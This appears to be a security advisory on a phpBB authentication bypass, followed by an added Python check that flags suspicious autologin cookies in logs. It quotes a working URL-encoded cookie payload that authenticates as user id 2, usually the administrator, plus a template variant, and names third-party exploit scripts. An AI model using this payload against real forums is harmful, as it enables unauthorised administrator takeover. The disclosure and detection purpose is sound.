PHPBB Authentication Bypass Vulnerability
An exploit is not required. The following proof of concept, demonstrating the cookie values necessary to authenticate to the account with numerical id '2' (typically the administrator account), is available:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

The following proof of concept was supplied by Dim K0r0l <dim@acolytez.com>:

a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A4%3A%22[id]%22%3B%7D

Paisterist has provided an exploit; additional exploits are made available by phuket (phpBBphuket.pl) and overdose <slythers@gmail.com> (phpbbexp.cpp). It should be noted that the integrity of 'phpbbexp.cpp' has not been verified by Symantec.
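For reviewing web server logs or captured requests, the check below URL-decodes a cookie value, parses the PHP-serialized array and flags an autologinid that is not a string, which is what the first value above carries (b:1, a boolean). It is an added example, not part of the original advisory or of phpBB; the function names, the constructed benign sample, and the assumption that a genuine autologinid is empty or 32 hex characters are the editor's.

```python
import re
from urllib.parse import quote, unquote

# POC is the first cookie value quoted in the advisory; BENIGN is constructed.
POC = ("a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B"
       "s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D")
BENIGN = quote('a:2:{s:11:"autologinid";s:32:"0123456789abcdef0123456789abcdef";'
               's:6:"userid";s:1:"5";}', safe="")

STR = re.compile(r's:(\d+):"')
NUM = re.compile(r'([bi]):(-?\d+);')

def parse_flat_array(raw):
    """Parse a flat PHP-serialized array of s/b/i scalars into {key: (type, value)}."""
    head = re.match(r'a:(\d+):\{', raw)
    if not head:
        raise ValueError("not a serialized array")
    pos, scalars = head.end(), []
    while raw[pos:pos + 1] != "}":
        m = STR.match(raw, pos)
        if m:
            end = m.end() + int(m.group(1))      # declared length, ASCII assumed
            if raw[end:end + 2] != '";':
                raise ValueError("string length mismatch")
            scalars.append(("s", raw[m.end():end]))
            pos = end + 2
            continue
        m = NUM.match(raw, pos)
        if not m:
            raise ValueError("unsupported or truncated element")
        scalars.append((m.group(1), int(m.group(2))))
        pos = m.end()
    if len(scalars) != 2 * int(head.group(1)):
        raise ValueError("element count mismatch")
    return {k[1]: v for k, v in zip(scalars[0::2], scalars[1::2])}

def check_cookie(cookie_value):
    """Return 'ok', 'malformed', or a 'suspicious: ...' verdict for one cookie value."""
    try:
        fields = parse_flat_array(unquote(cookie_value))
    except ValueError:
        return "malformed"
    kind, value = fields.get("autologinid", ("s", ""))
    if kind != "s":
        return "suspicious: autologinid is type %r, not a string" % kind
    # Assumption: a genuine autologinid is empty or 32 lowercase hex characters.
    if value and not re.fullmatch(r"[0-9a-f]{32}", value):
        return "suspicious: autologinid is not a 32-character hex string"
    return "ok"
```

The second value above is a template (its declared string length does not match its contents and [id] is a placeholder), so this check reports it as malformed rather than parsing it.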